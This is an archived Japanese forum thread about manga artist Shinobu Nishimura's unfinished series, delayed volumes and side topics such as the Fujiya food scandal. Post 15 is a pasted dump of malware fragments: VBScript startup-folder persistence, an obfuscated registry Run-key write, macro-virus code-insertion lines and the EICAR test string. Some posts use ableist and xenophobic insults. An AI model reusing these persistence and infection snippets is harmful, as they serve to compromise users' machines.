5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

西村しのぶver.19

1 :花と名無しさん:2007/01/08(月) 21:26:04 ID:Twa7//7j0
前スレ
西村しのぶver.18
http://comic7.2ch.net/test/read.cgi/gcomic/1161700404/
過去スレ、関連サイトは >>2-3 あたり

2 :花と名無しさん:2007/01/08(月) 21:26:35 ID:???0
初代、西村しのぶ(行方不明)

西村しのぶ2
http://piza.2ch.net/log2/gcomic/kako/951/951135495.html
西村しのぶ3
http://mentai.2ch.net/gcomic/kako/960/960163019.html
西村しのぶVer.3.5
http://salad.2ch.net/gcomic/kako/965/965141596.html
西村しのぶVer.4
http://salad.2ch.net/gcomic/kako/979/979741068.html
西村しのぶ Ver.5
http://salad.2ch.net/gcomic/kako/987/987565500.html
西村しのぶ Ver.6
http://salad.2ch.net/gcomic/kako/990/990888254.html
西村しのぶver.7
http://comic.2ch.net/gcomic/kako/996/996579152.html
西村しのぶver.7.5(html化待ち)
http://comic.2ch.net/test/read.cgi/gcomic/1009639304/
西村しのぶ Ver.8
http://comic.2ch.net/gcomic/kako/1019/10191/1019183796.html
西村しのぶ Ver.9
http://comic.2ch.net/gcomic/kako/1031/10310/1031087939.html
西村しのぶ Ver.10
http://comic.2ch.net/test/read.cgi/gcomic/1039930947

3 :花と名無しさん:2007/01/08(月) 21:27:23 ID:???0
西村しのぶ Ver.11
http://comic.2ch.net/test/read.cgi/gcomic/1055774650/
西村しのぶ Ver.11 (実質 Ver.12)
http://comic6.2ch.net/test/read.cgi/gcomic/1070890728/  
西村しのぶver.13
http://comic6.2ch.net/test/read.cgi/gcomic/1095069474/
西村しのぶver.14
http://comic6.2ch.net/test/read.cgi/gcomic/1112228923/
西村しのぶver.15
http://comic6.2ch.net/test/read.cgi/gcomic/1123644002/
西村しのぶver.16
http://comic6.2ch.net/test/read.cgi/gcomic/1138134532/
西村しのぶver.17
http://comic6.2ch.net/test/read.cgi/gcomic/1151831024/

西村しのぶ公式WEBサイト「下山手ドレス別館」
ttp://www.asobiba.gr.jp/dress/

4 :花と名無しさん:2007/01/08(月) 22:46:25 ID:???O
>>1乙。
保守って何時間以内?

超遅れ馳せながら、サドガ3巻表紙見た。
なによあれ…別物どころの話じゃないっしょ。
横に「Yoriko」とか書いちゃってるのがまた
可笑しくて、やがて哀しき…or2

5 :花と名無しさん:2007/01/08(月) 23:46:26 ID:???0
>>1

小池書院HP
http://www.koike-shoin.co.jp/

6 :花と名無しさん:2007/01/09(火) 00:16:33 ID:???0
wiki見たら、未完の作品が多い、とか
あんまり誉められた内容じゃない事ばっか書いてる。
サドガをしっかり完結させればよかったのになあガハ…


7 :花と名無しさん:2007/01/09(火) 02:16:13 ID:???0
未完作品が多い作家(特に同人系)はけっこういるけど、この人はどうもね。
同じ作品(しかも未完)を形態や出版社を変えて何度も出したりするからなあ。
雑誌が無くなったとはいえ、あまりいい印象の行為ではないよね。


8 :花と名無しさん:2007/01/09(火) 07:38:05 ID:???0
未完作品ってサドガだけじゃん。
それでもいつ終わってもおかしくない内容だ。


9 :花と名無しさん:2007/01/09(火) 08:58:26 ID:???0
>>8
じゃあ逆にちゃんと完結している作品を上げよ。

10 :花と名無しさん:2007/01/09(火) 10:05:13 ID:???O
そうだね
何だろう完結させたの?
スリップも中断のまま完結だもんね
全て未完かな?
今気が付きました

11 :花と名無しさん:2007/01/09(火) 10:09:43 ID:???0
美紅・舞子ぐらい?

12 :花と名無しさん:2007/01/09(火) 10:23:44 ID:???0
これで合ってる?

【完】
美紅・舞子
SLIP


【未完】(放置宣言済み)
サード・ガール 
メディックス

【未完】(首の皮一枚でいまだになんとか連載中)
一緒に遭難したいひと
RUSH
ライン
アルコール

13 :花と名無しさん:2007/01/09(火) 15:16:40 ID:???0
メディックスは単行本にした時点で終了だと思っている。
サドガも愛憎版出切ったら終了でいいよもう。
後4つは未完じゃなくって一応連載中でいいよ。
不定期連載中。

14 :花と名無しさん:2007/01/09(火) 15:53:14 ID:???0
SLIPは・・・・やっぱ終わったんだろうなあw

15 :花と名無しさん:2007/01/09(火) 16:58:00 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

16 :花と名無しさん:2007/01/09(火) 17:55:05 ID:???0
SLIPは最終回と連載誌に出ていたから
終了してるでしょ。

17 :花と名無しさん:2007/01/09(火) 22:45:13 ID:???0
コミックス派だったからここの過去ログで知って
あんなところで終わりなの!?と
数回読み直したよw

18 :花と名無しさん:2007/01/09(火) 23:33:34 ID:???0
一緒に遭難したいひと
RUSH
ライン
アルコール

う〜ん…全てほぼ同じ内容というか。
書いていること変わらない…

19 :花と名無しさん:2007/01/10(水) 00:26:24 ID:???0
以下「ちょっとずry」のレス禁止

20 :花と名無しさん:2007/01/10(水) 00:33:14 ID:???0
フィーヤン立ち読みしたけどガハの後でパリパリ読んだら
ガハが何描いてたのか忘れた

21 :花と名無しさん:2007/01/10(水) 00:50:57 ID:???0
前スレ997までしかログ取得してなかったのに、もう落ちてるorz
誰か998-1000コピペしてえ

22 :花と名無しさん:2007/01/10(水) 01:13:01 ID:???0
まりをちゃんのこと
ttp://s-io.net/up/2/_/jump/1168358840643813.zIE2Is

DLキーはコサージュをアルファベットで。

23 :花と名無しさん:2007/01/10(水) 10:44:05 ID:???0
>>21

998 名前:花と名無しさん メェル:sage 投稿日:2007/01/08(月) 21:28:01 ID:???0
立ててみました。

西村しのぶver.19
http://comic7.2ch.net/test/read.cgi/gcomic/1168259164/

999 名前:花と名無しさん メェル:sage 投稿日:2007/01/08(月) 21:37:23 ID:???0
>>998


1000 名前:花と名無しさん メェル:sage 投稿日:2007/01/08(月) 21:44:03 ID:???0
埋めついで
>>997
zipファイルを展開して出来る__MACOSXってフォルダはMacOS系のリソース
ってモンが保存されてるフォルダで、その他のOSでは無視していい物です。
だから、壊れてるかと言われると壊れてないんだけど、Windowsじゃあ
利用しない情報ですね。

>>998


1001 名前:1001 投稿日:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

これでいい?

24 :花と名無しさん:2007/01/10(水) 11:15:28 ID:???0
>>23
サンキュー愛してる

25 :花と名無しさん:2007/01/10(水) 19:21:34 ID:???0
>>22
ありがと!(・∀・)

中断してから、もう何年経つんでしょうね…
さすが、お米代の漫画家…とか思いつつも、新刊出れば読んでしまうし、
好きなんだろうなあ。
諦めつつひそかに応援するよ>画伯

26 :花と名無しさん:2007/01/11(木) 09:29:24 ID:???0
http://news21.2ch.net/test/read.cgi/bizplus/1168437656/l50
不二家、期限切れ牛乳を使ったシュークリームを製造・出荷:公表せず


27 :花と名無しさん:2007/01/11(木) 10:01:53 ID:???0
>>26
確かに関連記事w

28 :花と名無しさん:2007/01/11(木) 18:54:47 ID:???0
夜莉たんは今37くらい?



29 :花と名無しさん:2007/01/11(木) 19:08:23 ID:???0
夜梨たん同い年。今度の3月で37だお

30 :花と名無しさん:2007/01/11(木) 21:17:31 ID:???0
1970年3月3日だっけ?

31 :花と名無しさん:2007/01/11(木) 21:48:24 ID:???0
585 :可愛い奥様:2007/01/11(木) 19:08:17 ID:LDvMMvO8
>>574
その話、もともとは有名なケーキマニアの
池田貴公子(って、知ってる奥いらっさる・・?)が
自分の著書に書いてたんだよね
不二家のは使用済みの生クリームのカスを集めてる生クリーム使用だって
有名ケーキブランド(?)の中では最低品質の生クリームらしいよ
10年くらい前の話だから今はどうかわからないけど


誕生日には不二家の丸ケーキですよね?!
と言い切ってたガハ哀れ

32 :花と名無しさん:2007/01/11(木) 22:24:45 ID:5xItCsD20
・消費期限切れの牛乳を使ってシュークリームを出荷した不二家が、問題が発覚すれば
 雪印乳業の二の舞いになるとして、公表しないよう検討していたことが明らかになりました。
 期限切れの牛乳を使っていたことは、不二家社内を改革する目的で設置した委員会の
 内部調査で発覚しました。問題が分かった後、委員会の場で、幹部らは、外部からの
 批判が相次ぐことを恐れて公表しない方向で検討し、その結果を内部文書にまとめました。
 内部文書が外部に漏れて問題が発覚しましたが、会見で、不二家は「隠ぺいの意図は
 なかった」と説明しました。問題の発覚を受けて、全国で洋菓子を販売する不二家の店舗は、
 11日から営業を停止しています。
 http://headlines.yahoo.co.jp/videonews/ann/20070111/20070111-00000028-ann-bus_all.html

・同社によると、今回の問題は昨秋からの社内調査で発覚した。埼玉県の埼玉工場では、
 期限切れで廃棄されているはずの牛乳やリンゴの加工品について、廃棄された記録が
 なかったという。
 大量のネズミが同工場で捕獲されていたなどの新事実を次々と明らかにしながら、会見で
 同社側は「チェック態勢の改善を指示した」などと繰り返し強調した。
 「11月の時点で問題が発覚していたのに今になって公表した。隠蔽する意図があったのでは」
 などとの質問が浴びせられると、藤井社長は「社内の対応策に気を取られて意識が及ばなかった。
 考えに甘さがあった」とうつむいた。

33 :花と名無しさん:2007/01/11(木) 22:56:49 ID:???0
関西の不二家は泉佐野工場だから無問題。
安心してペコちゃん焼印入り冷凍ホットケーキを食べるがいいわ。

34 :花と名無しさん:2007/01/11(木) 23:35:43 ID:???0
いや全国でやってそうな予感。

まあガハは雰囲気だけ好きだから、いっか。

35 :花と名無しさん:2007/01/11(木) 23:44:38 ID:???0
ニュースで言ってたが、不二家側の発表によると

・洋菓子の販売停止は工場の操業停止に伴うもの
・洋菓子を製造する5工場(札幌、野木、埼玉、泉佐野、九州)は全て操業停止
・工場の操業再開には少なくとも一週間かかる

埼玉を含め札幌、野木(栃木)、泉佐野(大阪)、九州(佐賀)の洋菓子5工場の操業

ということだそうで。一週間後に再発防止策を発表して、
あとは「禊は済んだ」という予定でいるかもしれないね。
それにしても浅薄な>>33が哀れ

36 :花と名無しさん:2007/01/11(木) 23:59:31 ID:???0
と、このように空気読めない人によって
スレ違いのネタで占拠されるのがガハスレのお約束。

37 :花と名無しさん:2007/01/12(金) 00:04:38 ID:???0
>>36
関連する話題だというのは否定しようがないw
あなた、>>33ですね?w

38 :花と名無しさん:2007/01/12(金) 00:05:08 ID:???0
無駄な長文で不二家ネタ引っぱりすぎ

39 :花と名無しさん:2007/01/12(金) 00:14:44 ID:???0
33 名前:花と名無しさん 投稿日:2007/01/11(木) 22:56:49 ID:???0
関西の不二家は泉佐野工場だから無問題。
安心してペコちゃん焼印入り冷凍ホットケーキを食べるがいいわ。

40 :花と名無しさん:2007/01/12(金) 00:20:10 ID:???0
そろそろこちらへどうぞ↓

腐女子・ウザい女2ちゃんねらのガイドライン39
http://ex13.2ch.net/test/read.cgi/gline/1168523222/

41 :花と名無しさん:2007/01/12(金) 00:21:15 ID:???0
西村先生、>>33をどうにかしてください。

42 :花と名無しさん:2007/01/12(金) 10:02:44 ID:KZiWioIr0
「下山手ドレス別館」の日記みてるんだけど更新されないの?放置?
リンクされて漫画ネタにもなった浮世絵亭も仕事ないのかな?
なんかどっちも放置で寂れてるよね

43 :花と名無しさん:2007/01/12(金) 12:59:07 ID:???0
ブログ以前からのものだから、更新が大変なんだろうね。
日記部分だけブログに切り替えるのも手なんだけど、
Webデザインや更新は他人に丸投げなんだろうし、
ガハがやりたいと思ってても作業者の都合で出来ないんだろうね。

っていうか、ガハは日記やりたがってないけどね。
やる気あるなら初期からガンガン更新してたろうし、
ガンガン更新してれば、作業頼まれてる方も更新多いんだな
って心構えが出来るもの。

44 :花と名無しさん:2007/01/12(金) 19:37:40 ID:???0
なんか2ちゃんねる無くなるかもらしいね。
避難先決まってないけど、みんなさよなら

45 :花と名無しさん:2007/01/12(金) 19:50:18 ID:???0
ガハが日記をマメに更新したらそれこそ
作品とかぶりまくりそう
次回作の内容が予想できちゃう状態

46 :花と名無しさん:2007/01/12(金) 20:20:27 ID:???0
ブログやってまめに更新している漫画家、Aさんの場合。
ネームやってるときに
「あ、これブログに書いた」
「これも書いちゃった」
「あ・・・・・」
という事態に陥るが、ブログに書いていないネタに気付いてネーム完成。

我等が西村画伯が日記をまめに更新していた場合。
ネームやってるときに
「あ、これブログに書いた」
「これも書いちゃった」
「あ・・・・・」
という事態に陥るが、気にせず既出ネタを使ってネーム完成。

47 :花と名無しさん:2007/01/12(金) 23:32:41 ID:???0
>>44
>無くなるかもらしいね。

変な日本語。

48 :花と名無しさん:2007/01/13(土) 04:11:16 ID:???0
「無くなるかもしれない」らしいね。

「らしい」と書いてる点から、「無くなるかもしれない」という話を
また聞きのかたちで書き込んでいると分かる。
分からないのは日本国籍じゃないからだろう

49 :花と名無しさん:2007/01/13(土) 16:35:27 ID:???0
2chはぴろゆきの所有物じゃないからなくならないと思うけどね。
どっかの弁護士のブログで
「ドメイン差し押さえは実質的に無理」とか
「2chは法人でぴろゆきの財産ではない」というのを読んだし。
せいぜいトップページの壷に差し押さえの赤札が貼られた程度。



50 :花と名無しさん:2007/01/13(土) 18:54:27 ID:???O
>>48
ギャルなら日本国籍でも日本語扱えなくなってる時代だよ。
すぐ叩きネタにすんのやめれ。

51 :花と名無しさん:2007/01/13(土) 18:57:39 ID:???0
>>50
若くてもきちんとした日本語話せる子は沢山います。

52 :花と名無しさん:2007/01/13(土) 19:19:40 ID:???O
>>51
なんだ、いつもの人か。
それなら日本国籍以外でもそれは同じじゃないですか?
国籍にこだわる理由は?

53 :花と名無しさん:2007/01/13(土) 23:02:50 ID:???0
52っていつも誰かのレスにケチつける人か。


54 :花と名無しさん:2007/01/13(土) 23:43:44 ID:???0
52
51ですが、48さんではないです。
想像で勝手に同一人物にしないでください。

55 :花と名無しさん:2007/01/14(日) 00:18:46 ID:???0
あほかお前ら

56 :花と名無しさん:2007/01/14(日) 01:15:01 ID:???0
ホームパイとネクターが無事ならOk

57 :花と名無しさん:2007/01/14(日) 04:23:28 ID:???0
>>49
あの弁護士の一般的評価はdでもない馬鹿だから、信用しちゃだめだよ。
ヤクザ並みの言いがかりで訴訟起こす弁護士だからね。

いつもの荒らしはどうやら在日外国人のようだね。
火病ってるし

58 :花と名無しさん:2007/01/14(日) 06:10:17 ID:???O
大体、ドメイン名なんて簡単に名変できるし、資産的価値があるモンでもないから・・・
現時点でwhoisではどうなってるんだろう?

59 :花と名無しさん:2007/01/14(日) 17:59:58 ID:???0
「ドメインには資産価値があり、差し押さえ対象に出来る」
というのが東京地裁の判断。

でも2ちゃんねるのドメインはひろゆきに所有権があるわけではないので、
ひとゆき個人に対する差し押さえの際に、2ch.netのドメインを差し押さえる
ことは出来ない。そもそもnetなんだから海外ドメイン。

60 :花と名無しさん:2007/01/14(日) 20:33:28 ID:???0
ただの釣りだったのにいつまでもお前らときたら…

61 :花と名無しさん:2007/01/16(火) 12:39:13 ID:???0
目新しいモノにはとりあえず乗っとけ、
流行を先取りしちゃうかも。
・・・それが西村クオリティ。

62 :花と名無しさん:2007/01/17(水) 14:39:12 ID:???0
ラインの4ってホントに今月出るの?
いつの間にか7&Yの予約が終了してた…
出ないから打ち切ったのかもしれないけど。

63 :花と名無しさん:2007/01/17(水) 22:36:15 ID:???0
出る予定だったことも知らなかった・・・

64 :花と名無しさん:2007/01/18(木) 07:36:51 ID:???O
返本の山になってるサードガールの為も出すんじゃないか
少しでも騙して売らないと8まで行かないだろ

65 :花と名無しさん:2007/01/19(金) 00:19:20 ID:???0
印税って売れた数じゃなくて
発行部数で出るんだっけ?

ガハ小金餅〜
で、また浪費か

66 :花と名無しさん:2007/01/19(金) 00:49:54 ID:???0
本なら発行部数、CDならプレス枚数
新装版のサドガはガチで全く売れてないので
巻を重ねるごとに部数は減っていってる可能性大。
小池は小学館や講談社のような力がないので
本屋に押し付けることも出来ないし、
無理強いして本屋から総スカン喰らうのもマズイので
売れない本の続巻は部数を減らしていくしかない。

値段が半分だったら、今よりもう少しだけ売れたかもね。

67 :花と名無しさん:2007/01/19(金) 01:06:12 ID:???0
中だるみの5巻あたりでまたサイン会やれば何百冊か売れるんでね

68 :花と名無しさん:2007/01/19(金) 01:28:06 ID:???0
1巻出すたびに47都道府県を1〜2都市ずつ
行脚しながらサイン会しまくればいい。
全部で100回開催として、1回100人でも1万部だ。
発売ペースを3ヶ月に1巻に落とせば、
1巻ごとに100回のサイン回は可能。

ちなみに、別館サイトの方をチェックしてみたら
ライン4は予定通りには出ないようなことが書いてあったよ。

>『ライン』4巻(講談社) ・・・は、
>続報を今しばらくお待ち下さい(ペコペコ)

69 :花と名無しさん:2007/01/19(金) 02:22:16 ID:???0
出す出す詐ry

70 :花と名無しさん:2007/01/19(金) 03:18:05 ID:???0
発売予定日に発売するつもりがないなら、
ぎりぎりまで発表するんじゃねえよ!

って講談社にゴルァ電しようよ

71 :花と名無しさん:2007/01/19(金) 06:02:38 ID:???0
>>70
>って講談社にゴルァ電しようよ
脳に障害でもあるのか?

72 :花と名無しさん:2007/01/19(金) 17:10:14 ID:???0
>>70
いや〜、そこまで楽しみにしてないし。

しかし何様ガハ…売れてないのに。


73 :花と名無しさん:2007/01/19(金) 18:24:18 ID:???O
>>69
何度引っ掛かっただろう?
防御する手があればなぁ
情報仕入れない事かね

74 :花と名無しさん:2007/01/19(金) 21:28:26 ID:???0
>>68
モー娘のデビューした頃みたい

75 :花と名無しさん:2007/01/19(金) 21:52:01 ID:???0
>>71
ガハサイトで発表しただけじゃなく、
講談社も発売予定リストに載せてたわけで。

脳に障害があるのはあなた自身のようですね。

76 :花と名無しさん:2007/01/19(金) 21:59:19 ID:???0
この人は原稿どころか連載飛ばすのすらデフォ。
他を新規開拓しながら生暖かくマテ

77 :花と名無しさん:2007/01/19(金) 22:57:49 ID:???0
毎年、震災の日が来ると「ああガハはダメになったなぁ」と
思わずにいられない。
あのまま神戸在住だったら、震災が無かったらどうだったんだろう?

78 :花と名無しさん:2007/01/19(金) 23:17:40 ID:???0
震災なかったとしても、米代稼ぐだけなのは元々だしね。
DQNも震災のせいじゃなくて、元々DQNだっただけじゃないかな。
サドガや美紅舞子でも未成年の煙草シーンあったし。
少年誌だと禁止なんだよね、未成年の飲酒喫煙シーン。

79 :花と名無しさん:2007/01/19(金) 23:17:45 ID:???0
「震災のせいで」って言い訳がないままダメになってたかも知れんがね

80 :花と名無しさん:2007/01/20(土) 00:58:00 ID:???0
>>75
発売リストにのってようと
たかが漫画のために講談社にゴルァするなんて
脳に障害があるんじゃねpgr
されても仕方ないと思われ



81 :花と名無しさん:2007/01/20(土) 01:30:54 ID:???O
>>80
ゴルァする気力のある勇者を叩くのはやめようよ
もうすぐこちら側に落ちるよ

82 :花と名無しさん:2007/01/20(土) 02:46:28 ID:???0
>>81
80は昨日小池書院に「LINE4遅いぞ馬鹿」ってゴルァ電しちゃったんだよ
察してあげようよ

少女漫画板に書き込んでおいてたかが漫画とか笑わせてくれるww

83 :花と名無しさん:2007/01/20(土) 09:39:27 ID:???0
>>82
そんなことしないよ。バカ?
ゴルァすることに対してたかが漫画って言ったんだけど
理解できないの?バカ?

84 :花と名無しさん:2007/01/20(土) 14:07:59 ID:???0
いつもの人乙

85 :花と名無しさん:2007/01/21(日) 17:58:11 ID:???0
>>82
もししたらどうだっていうんだ?
そんだけ熱心なファンがいるってことでいいと思うけど。

私はもうどっちでもいいので
ガハが漫画止めようがどんどんつまらなくなろうが…

86 :花と名無しさん:2007/01/22(月) 01:12:03 ID:???0
>>85
講談社が発売予定を発表したライン4の発売が延期されたからって、
小池書院に苦情の電話入れてどうするの?

よく読んでから書き込めばいいのに。
いつもの火病の人?

87 :花と名無しさん:2007/01/22(月) 08:14:34 ID:???0
脳に障害があるんじゃ?と書いた自分が悪かったよ
みんな許してくれ
いつもの人は早とちりの文盲さんだったんだな

88 :85:2007/01/22(月) 22:20:30 ID:???0
>>86
他人ですが何カッカしてるのですか。
したらしたで、あっそですむでしょうに。

89 :花と名無しさん:2007/01/23(火) 08:57:34 ID:???0
>>71は悪意まるだしの書き込みのお手本みたいなもの。
あんな書き込みする奴の相手する必要無し。

>>85はいつもの人。ただの荒らしでガハ漫画を読んだことも
無い奴だから相手する必要無し。

>>87は無視されそうな気配を感じてる構ってちゃんな荒らし。
当然相手にする必要無し。

>>88はいつもの人。

90 :花と名無しさん:2007/01/23(火) 09:09:50 ID:???0
若い女性に腹巻き人気:健康効果、医者も注目
http://news21.2ch.net/test/read.cgi/bizplus/1169420390/l50

91 :花と名無しさん:2007/01/23(火) 09:33:28 ID:???0
まだそんなに熱い思いを持ち続けている人がいたことに落涙。
いや、マジで。

92 :花と名無しさん:2007/01/23(火) 21:53:28 ID:???0
NHK今日の料理に
ガハを1.5倍に増量したような雰囲気の先生が出てた
http://www.e-gohan.com/author/8.html
出してきたご飯が五穀米だったのでちょっと笑った
ガハは雑穀米顔なのか。。

93 :花と名無しさん:2007/01/23(火) 22:10:37 ID:???0


94 :花と名無しさん:2007/01/23(火) 22:15:51 ID:???0
草履がお

95 :花と名無しさん:2007/01/23(火) 23:20:15 ID:???0
>>89
妄想乙としか言いようが無い。
脳に障害かわいそう


96 :花と名無しさん:2007/01/24(水) 01:42:37 ID:???O
障がいとか煽り文句に使うのやめなよ
道徳心ない訳?

97 :花と名無しさん:2007/01/24(水) 05:16:08 ID:???0
3月もライン新刊出ません

98 :花と名無しさん:2007/01/24(水) 08:27:57 ID:???O
2ちゃんのガハ板と道徳心は相入れないかもね

99 :花と名無しさん:2007/01/24(水) 18:33:47 ID:???0
2ちゃんにガハ板など無い

これだから素人は(ry

100 :花と名無しさん:2007/01/24(水) 21:06:48 ID:q0ibDCaZ0
http://headlines.yahoo.co.jp/videonews/ann/20070124/20070124-00000009-ann-soci.html
これは酷い

101 :花と名無しさん:2007/01/24(水) 23:02:08 ID:???0
道徳心なんて無いだろw
ガハだって

26 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)